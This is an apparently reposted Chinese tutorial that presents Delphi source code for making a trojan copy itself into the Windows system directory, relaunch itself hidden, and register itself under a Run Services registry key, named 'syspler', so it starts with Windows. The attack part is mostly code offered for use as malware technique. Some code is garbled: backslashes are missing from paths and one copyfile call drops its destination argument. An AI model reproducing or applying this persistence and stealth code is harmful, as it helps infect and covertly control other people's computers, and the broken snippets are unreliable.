Delphi实现木马自我拷贝方法
发布时间:2020-12-15 04:24:16 所属栏目:大数据 来源:网络整理
导读:木马实现自我拷贝的原理是程序运行时先查看自己是不是在特定目录下,如果是就继续运行,如果不是就把自己拷贝到特定目录下,然后运行新程序,继而退出旧程序. 本例即以Delphi实现木马的自我拷贝。 首先打开Delphi,新建一个工程,在窗口的Create事件中写入如下代码
|
木马实现自我拷贝的原理是程序运行时先查看自己是不是在特定目录下,如果是就继续运行,如果不是就把自己拷贝到特定目录下,然后运行新程序,继而退出旧程序.
procedure TForm1.FormCreate(Sender: TObject);
var myname: string;
begin
myname := ExtractFilename(Application.Exename); //获得文件名
if application.Exename <> GetWindir + myname then //如果文件不是在WindowsSystem那么..
begin
copyfile(pchar(application.Exename),pchar(GetWindir + myname),False);{将自己拷贝到WindowsSystem下}
Winexec(pchar(GetWindir + myname),sw_hide);//运行WindowsSystem下的新文件
application.Terminate;//退出
end;
end;
其中GetWinDir是自定义函数,起功能是找出WindowsSystem的路径. function GetWinDir: String; var Buf: array[0..MAX_PATH] of char; begin GetSystemDirectory(Buf,MAX_PATH); Result := Buf; if Result[Length(Result)]<>'' then Result := Result + ''; end; 如何能使程序能在windows启动时自动启动?
procedure TForm1.FormCreate(Sender: TObject);
const K = 'SoftwareMicrosoftWindowsCurrentVersionRunServices';
var myname: string;
begin
myname := ExtractFilename(Application.Exename); //获得文件名
if application.Exename <> GetWindir + myname then //如果文件不是在WindowsSystem那么..
begin
copyfile(pchar(application.Exename),False);{//将自己拷贝到Windows/System32下}
Winexec(pchar(GetWindir + myname),sw_hide);//运行WindowsSystem下的新文件
application.Terminate;//退出
end;
with TRegistry.Create do
try
RootKey := HKEY_LOCAL_MACHINE;
OpenKey( K,TRUE );
WriteString( 'syspler',application.ExeName );
finally
free;
end;
end;
(编辑:李大同) 【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容! |